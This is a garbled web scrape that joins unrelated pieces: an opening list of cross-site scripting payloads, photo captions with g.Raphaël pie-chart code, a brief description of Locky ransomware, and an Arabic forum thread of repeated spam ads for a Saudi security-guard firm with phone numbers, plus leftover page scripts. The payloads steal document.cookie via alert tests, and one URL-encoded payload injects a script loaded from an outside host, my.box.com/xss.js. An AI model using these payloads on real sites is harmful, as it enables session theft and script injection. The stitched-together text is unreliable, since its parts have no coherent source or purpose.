“>alert(document.cookie)

“><alert(document.cookie);//<

fooalert(document.cookie)

<script>alert(document.cookie)</script>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

alert(document.cookie)

  

alert(1)

">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))

 

Best viewed in original size since flickr doesn't like transparent PNGs it seems.

 

Playing with my server side JS web framework (which is JSGI compliant)

 

So of course we need some eye candy: this is the default 404 page, which shows the dispatch table. Thanks to evilstreak for the styling/idea

One of our co-workers said goodbye in Javascript. :-p

First step in g.Raphaël. :)

Here is the code:

Raphael("piechart", 400, 300).g.piechart(150, 150, 100, [4, 4, 2, 1, 1, 1]).stroke("#fff").legend(["%%.% JS", "%%.% HTML", "%%.% CSS", "%%.% VM", "%%.% JAVA", "%%.% VMD"]).hover(function () {

this.sector.stop();

this.sector.scale(1.1, 1.1, this.cx, this.cy);

if (this.label) {

this.label[0].stop();

this.label[0].scale(1.5);

this.label[1].attr({"font-weight": 800});

}

}, function () {

this.sector.animate({scale: [1, 1, this.cx, this.cy]}, 500);

if (this.label) {

this.label[0].animate({scale: 1}, 500);

this.label[1].attr({"font-weight": 400});

}

});

He might not be powered by JavaScript, but he wishes he were.

Example of Locky ransomware.

 

Locky is ransomware malware released in 2016. It is delivered by email and after infection will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

The current version, released in December 2016, utilizes the .osiris extension for encrypted files.

 

Many different distribution methods for Locky have been used since the ransomware was released. These distribution methods include Word and Excel attachments with malicious macros,DOCM attachments and zipped JS Attachments.

 

Read more: en.wikipedia.org/wiki/Locky

Work in progress on g.Raphaël

شركة حراسات أمنية بالمملكة العربية السعودية 0531567718*0554807557 غياث أبو زيد

شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية

 

//

     

if (parent.frames.length > 0) {parent.location.href = self.document.location;document.location.reload();}

اسم العضو حفظ البيانات؟ كلمة المرور عالم المرأة المنتديات عالم الطبخ عالم الالعاب عالم التسوق رسائل الجوال اعلن معنا مواضيع اليوم التسجيل البحث التعليمـــات

if(document.location.protocol=='http:'){

var Tynt=Tynt||[];Tynt.push('abdIAoyVir4iuwadbi-bpO');Tynt.i={"st":true,"ap":"شاهد من هنا عالم المرأة :"};

(function(){var s=document.createElement('script');s.async="async";s.type="text/javascript";s.src='http://tcr.tynt.com/ti.js';var h=document.getElementsByTagName('script')[0];h.parentNode.insertBefore(s,h);})();

}

معجبوا عالم المرأة على الفايسبوك و قوقل+ (function(d, s, id) {

var js, fjs = d.getElementsByTagName(s)[0];

if (d.getElementById(id)) {return;}

js = d.createElement(s); js.id = id;

js.src = "//connect.facebook.net/ar_AR/all.js#xfbml=1";

fjs.parentNode.insertBefore(js, fjs);

}(document, 'script', 'facebook-jssdk'));   منتديات عالم المرأة » نكت - jokes - نكت محششين مضحكة - ضحك - طرائف » منتدى الزعيم - منتدى العالمي - منتديات كورة » عالم السيارات » اعلانات مبوبة - اعلانات مجانية - مستعمل

»

شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية

اعلانات مبوبة - اعلانات مجانية - مستعمل مستعمل حراج سوق سيارات تسوق اعلان مجلة البحث في المنتدى عرض المواضيع

 

عرض المشاركات بحث بالكلمة الدلالية البحث المتقدم الذهاب إلى الصفحة... <div class="nav"

 

مواضيع ذات علاقة

هواتف وكلاء السيارات في السعودية في قسم: عالم السيارات نسبة الطلاق في السعودية لعام 1432 هـ في قسم: المطلقات - و الارامل - و المتأخرات في الزواج (تطورات المشروع التغريبي في السعودية) في قسم: منتديات النقاش الجاد - الحوار دار رواية في قسم: سوق نسائي - سوق نساء السعودية - تسوق - Market شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية اعلانات مبوبة - اعلانات مجانية - مستعمل صفحة 1 من 2 1 2 >

 

أدوات الموضوع vbmenu_register("threadtools");

 

#1  

 

 27-05-2011, 24- 08:52

  ghyath عضوة نشيطة   تاريخ التسجيل: Feb 2009 الدولة: KSA-RIYADH المشاركات: 63المواضيع: 5 مشاركات: 58 شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية حراس أمن شركة حراسات أمنشركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعوديةحراس أمن مدربون جاهزون لخدمتكم 24/24 نحن نسهر على خدمتكم مراقبة 24 ساعة الاعمال التي نقوم بها هي : نقوم بتزويدكم بالموظفين المدربين : ( حارس أمن ليلي ) (حارس نهاري ) (موظف استقبال ) (حارسات نساء ) (( ليصلك كل

جديد أرسل الرقم 

1 الى - 81428 للإتصالات

السعودية  - 601428 لموبايلي - 701428

 زين )) (حراس التدخل السريع) (موظفي مرور للسيارات) للاتصال 0531567718 غياث المغربي ولكن من بعض النشاطات هي ... 1-دراسة نقاط ضعف المباني والمنشآت المختلفة وحماية الممتكات الخاصة والفيلات شركات تنقيب نفط وتكرير بترول وغاز واموال 2-القصور خدمات خاصة المصارف والبنوك وشركات الوساطة المالية والتامين واعادة التأمين والشركات الأموال شركات الطاقة والكهرباء وشركات الاتصالات شركات البترول والنفط والغاز بالشرقية والشركات التجارية والأهلية 3-المنتجعات والمنتزهات والمدارس والشركات الحكومية والشركات الخاصة مقاولات تجارية خدمات أمنية ولوجستية خدمات نقل وتخزين وتفريغ موظفي استقبال وتنظيم مرور المدارس 4-الاستراحات والمشاريع والورش والفنادق والشقق المفروشة والمخازن والورش الصناعية ومخازن المجوهرات ومحلات الذهب والمعارض الحساسة والاسواق والمراكز التجارية والمستشفيات في جميع انحاء المملكة جدة والوسطى والرياض والشمال والجنوب للاتصال 0531567718 غياث المغربي :icon 360:: icon360: هل تود المساهمة في

عالم المرأة  والحصول على مبلغ 500 دولار أمريكي؟

اقرأ شروط الجائزة! نحن شركة حراس أمن بالسعودية نخدمكم ونحميكم بتوفيق الله غياث 0554708393 كان الصوت الغريب يصدر من المطبخ ويصمت فور اقترابي منه أستطيع خدمتك بتقديم دراسة جدوى لمدرسة حق بنك التسليف وصندوق المئوية دراسة جدوى اقتصادية مدرسة روضة وتمهيدي وابتدائي بنك التسايف شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية

 

#2  

 

 27-05-2011, 24- 18:47

  صمود 2011 عضو ماسي   تاريخ التسجيل: Feb 2011 المشاركات: 293المواضيع: 13 مشاركات: 280 بالتـــــــــــــــــــــــــــوفيق اللهم احفظ قارئة الدعاء عرض فلل للبيــــــــــــــــــــــع سهام الليل وما أدراك ماسهام الليل شـــــــــــــــــــــــــــــــقق تمليــــــــــــــــــــــــــــــك عرضـــــــــــــ عقـــــــــــــــــــــار تفضــــــــــــــــــــلي هام لطفلك آخر التفاصيل الإعانة التي أمر بها الملك كــــــــــــــــــم نحــــــــــــــن بحــــــــــــــــاجة اليـــــــــــــــــــه أيــــــــــــها الإنسان ما أجهلك لنــــــــــفسك

 

#3  

 

 08-01-2012, 24- 23:22

  ghyath عضوة نشيطة   تاريخ التسجيل: Feb 2009 الدولة: KSA-RIYADH المشاركات: 63المواضيع: 5 مشاركات: 58 نحن نقدم لكم انفسنا شركة حراس أمن للمدارس حراسات أمنية بخدمتكم بالسعودية نحن نقدم لكم انفسنا شركة حراس أمن للمدارس حراسات أمنية بخدمتكم بالسعودية:27d 66a9c24b146327bf:e h_s(9): نحن شركة حراس أمن بالسعودية نخدمكم ونحميكم بتوفيق الله غياث 0554708393 كان الصوت الغريب يصدر من المطبخ ويصمت فور اقترابي منه أستطيع خدمتك بتقديم دراسة جدوى لمدرسة حق بنك التسليف وصندوق المئوية دراسة جدوى اقتصادية مدرسة روضة وتمهيدي وابتدائي بنك التسايف شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية

 

#4  

 

 15-02-2012, 24- 11:32

  ghyath عضوة نشيطة   تاريخ التسجيل: Feb 2009 الدولة: KSA-RIYADH المشاركات: 63المواضيع: 5 مشاركات: 58 شركة حراسات أمنية حراس أمن حارسات أمن الشركةغياث أبو زيد0531567718 الأمنية شركة حراسات أمنية حراس أمن حارسات أمن الشركةغياث أبو زيد0531567718 الأمنية نحن شركة حراس أمن بالسعودية نخدمكم ونحميكم بتوفيق الله غياث 0554708393 كان الصوت الغريب يصدر من المطبخ ويصمت فور اقترابي منه أستطيع خدمتك بتقديم دراسة جدوى لمدرسة حق بنك التسليف وصندوق المئوية دراسة جدوى اقتصادية مدرسة روضة وتمهيدي وابتدائي بنك التسايف شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية

 

#5  

 

 15-02-2012, 24- 11:34

  ghyath عضوة نشيطة   تاريخ التسجيل: Feb 2009 الدولة: KSA-RIYADH المشاركات: 63المواضيع: 5 مشاركات: 58 نحن شركة حراس أمن بالسعودية نخدمكم ونحميكم بتوفيق الله غياث 0554708393 نحن شركة حراس أمن بالسعودية نخدمكم ونحميكم بتوفيق الله غياث 0554708393 كان الصوت الغريب يصدر من المطبخ ويصمت فور اقترابي منه أستطيع خدمتك بتقديم دراسة جدوى لمدرسة حق بنك التسليف وصندوق المئوية دراسة جدوى اقتصادية مدرسة روضة وتمهيدي وابتدائي بنك التسايف شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية صفحة 1 من 2 1 2 > الكلمات الدلالية (Tags) حراس أمن شركة حراسات أمن « توكيل جروندج ت/01 توكيل جروندج داخل مصر

|

معدات فنادق ومطاعم – تجهيزات مطابخ ومطاعم وفنادق ( خصم 20% لمدة محدودة ) » شركة حراسات أمنيةوحراس مراقبة 24 ساعةداخل السعودية

 

شاهدي المزيد من هنا

مكياج

تسريحات

ازياء

وظائف نسائية

فساتين

الحياة الزوجية

سوق نسائي

العناية بالبشرة

العناية بالشعر

الحمل و الولادة

طبخ

ملابس اطفال رجيم

ملابس محجبات

ساعات

مجوهرات

شنط

فساتين زفاف

جلابيات

ملابس داخلية

عبايات

وظائف

العناية باليدين و بالقدمين

شراء و بيع فساتين

منتدى العروس

وصفات حلويات

ديكور

الثقافة الزوجية

دورات تدريبية

كوافيرات - مشاغل

شغالات - خادمات

تمارين شد البطن صور مستعمل - اعلانات عالم الرجل لانجري معارض نسائية منتجات تسوق - Shopping العاب زوجية زفات الطفل - الاطفال ديكور - ديكورات الكورشيه مسجات برامج قصص قصائد غرف نوم صحيفة

إعلانات - Advertising

أدوات الموضوع مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق التعليقات المنشورة لا تعبر عن رأي عالم

المرأة ولا نتحمل أي مسؤولية قانونية حيال ذلك  ويتحمل كاتبها مسؤولية النشر لا يجوز كتابة التعليقات و المشاركات 

التي تنتهك أيًّا من إرشادات المحتوى. من أمثلة

ذلك، المحتوى (الخاص بالبالغين) في

غير الأقسام المخصصه لذالك  أو العنف أو تأييد التعصب العرقي.

و  المواد المحمية بموجب حقوق الطبع و النشر

للتبيلغ عن محتوى مخالف الرجاء مراسلتنا من هنا العضوية :

التسجيل |

طلب كلمة المرور |

إعلانات Advertising |

عالم

المرأة |

privacy policy 

الساعة الآن حسب توقيت السعودية الرياض جدة و الدمام و دول الخليج قطر و البحرين و الامارات و الكويت و عمان24- 14:35.

خيارات وتحكم :

الاتصال بنا |

الأرشيف |

 

ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله , اللهم اني اسالك الهدى والتقى والعفاف والغنى 2011

 

Powered by vBulletin&reg, Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

 

SEO by vBSEO 3.5.2 ©2010, Crawlability, Inc. document.write(unescape("%3Cscript src=%27http://s10.histats.com/js15.js%27 type=%27text/javascript%27%3E%3C/script%3E")); www.histats.com

[حجم الصفحة الأصلي: 67.16 كيلو بايت... الحجم بعد الضغط 63.46 كيلو بايت... تم توفير 3.70 كيلو بايت...بمعدل (5.51%)]

 

//0){location.replace('http://forum.mn66.com/showthread.php?p='+cpostno);};} }

 

if(typeof window.orig_onload == "function") window.orig_onload();

}

 

//]]>

 

2 4 5 6 7 ••• 79 80